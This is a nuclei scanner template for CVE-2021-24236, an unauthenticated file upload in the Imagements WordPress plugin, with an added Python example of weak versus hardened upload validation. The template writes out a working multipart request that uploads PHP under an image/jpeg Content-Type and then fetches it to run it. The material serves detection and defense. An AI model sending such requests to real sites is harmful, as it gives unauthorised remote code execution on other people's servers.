id: CVE-2021-24236

info:
  name: WordPress Plugin Imagements 1.2.5 - Unauthenticated Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    The Imagements WordPress plugin through 1.2.5 allows images to be uploaded in comments, but it only checks the Content-Type of the request to forbid dangerous files. This allows unauthenticated attackers to upload arbitrary files by sending a valid image Content-Type along with a PHP filename and PHP code, leading to RCE.
  reference:
    - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
    - https://wordpress.org/plugins/imagements/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24236
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24236
    cwe-id: CWE-434
  tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin
variables:
  php: "{{to_lower('{{randstr}}')}}.php"
  post: "1"

requests:
  - raw:
      - |
        POST /wp-comments-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="author"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="email"

        {{randstr}}@email.com
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="url"


        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="checkbox"

        yes
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="naam"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="image"; filename="{{php}}"
        Content-Type: image/jpeg

        <?php echo 'CVE-2021-24236'; ?>
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="submit"

        Post Comment
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_post_ID"

        {{post}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_parent"

        0
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--

      - |
        GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2021-24236"
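The description above says the plugin forbids dangerous files only by looking at the request's Content-Type, which is why the template can send PHP under a `.php` filename with `Content-Type: image/jpeg`. The Python below is an added example, not the Imagements plugin's code and not part of the nuclei template: it builds a multipart body of the same shape as the template's POST (same boundary, `image` and `comment_post_ID` field names), parses the `image` part out again as a server would, and runs it through a Content-Type-only check beside a hardened check that ignores the declared type and instead requires a single allowlisted extension plus matching magic bytes. The filenames and sample bytes are constructed; the hardening rules are this example's, not the plugin's fix.

```python
"""Content-Type-only upload checks versus a hardened check.

Added example: this is not the Imagements plugin's code nor part of the
nuclei template; it only reuses the template's boundary, field names and
upload shape. Every request body below is constructed locally.
"""
import os
from email.parser import BytesParser

# Boundary and form-field names mirror the template's POST to wp-comments-post.php.
BOUNDARY = "----WebKitFormBoundaryIYl2Oz8ptq5OMtbU"

# Magic-byte signatures for the image formats the hardened check accepts.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
# Extension allowlist, and the signature each extension must carry.
EXT_TO_TYPE = {".jpg": "image/jpeg", ".jpeg": "image/jpeg", ".png": "image/png", ".gif": "image/gif"}


def build_comment_request(filename, declared_type, content, post_id="1"):
    """Build a multipart/form-data body shaped like the template's first request.

    Only the fields that matter for the upload path are included: the comment
    text, comment_post_ID and the `image` file part."""
    crlf = b"\r\n"
    sep = b"--" + BOUNDARY.encode()

    def text_field(name, value):
        return (sep + crlf
                + b'Content-Disposition: form-data; name="' + name.encode() + b'"' + crlf
                + crlf + value.encode() + crlf)

    file_part = (sep + crlf
                 + b'Content-Disposition: form-data; name="image"; filename="'
                 + filename.encode() + b'"' + crlf
                 + b"Content-Type: " + declared_type.encode() + crlf  # fully client-controlled
                 + crlf + content + crlf)
    return (text_field("comment", "nice picture")
            + text_field("comment_post_ID", post_id)
            + file_part
            + sep + b"--" + crlf)


def extract_upload(body, field="image"):
    """Server side: parse the multipart body and return
    (filename, declared Content-Type, raw bytes) for the named file field."""
    msg = BytesParser().parsebytes(
        b"Content-Type: multipart/form-data; boundary=" + BOUNDARY.encode() + b"\r\n\r\n" + body)
    for part in msg.get_payload():
        if part.get_param("name", header="content-disposition") == field:
            return part.get_filename(), part.get_content_type(), part.get_payload(decode=True)
    return None


def weak_check(filename, declared_type, data):
    """The pattern the advisory describes: trust only the client-supplied
    Content-Type. A .php file declared as image/jpeg passes."""
    return declared_type.startswith("image/")


def strong_check(filename, declared_type, data):
    """Hardened check (this example's rules). The declared type is ignored:
      * exactly one extension, and it must be on the allowlist (no shell.php.jpg);
      * the bytes must start with a known image signature;
      * the sniffed type must match the extension."""
    base = os.path.basename(filename)
    if base.count(".") != 1:
        return False
    ext = os.path.splitext(base)[1].lower()
    if ext not in EXT_TO_TYPE:
        return False
    sniffed = next((t for magic, t in IMAGE_MAGIC.items() if data.startswith(magic)), None)
    return sniffed == EXT_TO_TYPE[ext]


def evaluate(body):
    """Run both checks over a request body; returns (weak_accepts, strong_accepts)."""
    found = extract_upload(body)
    if found is None:
        return (False, False)
    return weak_check(*found), strong_check(*found)


# Constructed inputs. The first mirrors the template's payload: PHP code under a
# random-looking *.php name with an image/jpeg Content-Type.
PHP_PAYLOAD = build_comment_request("abcdefgh.php", "image/jpeg", b"<?php echo 'CVE-2021-24236'; ?>")
REAL_JPEG = build_comment_request("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01")
# A JPEG/PHP polyglot with a double extension: genuine magic bytes, so sniffing
# alone would pass it; the single-extension rule is what rejects it.
POLYGLOT = build_comment_request("shell.php.jpg", "image/jpeg",
                                 b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01<?php echo 'polyglot'; ?>")

if __name__ == "__main__":
    for label, body in (("template payload", PHP_PAYLOAD), ("genuine jpeg", REAL_JPEG), ("polyglot", POLYGLOT)):
        print("%-17s weak=%s strong=%s" % ((label,) + evaluate(body)))
```

Even the hardened check only decides what gets written; the other half of the fix is where it lands. The template's second request fetches the file back from `/wp-content/plugins/imagements/images/`, a web-served directory where the PHP interpreter runs it, so uploads should also be stored where script execution is disabled or served only through a handler that never executes them.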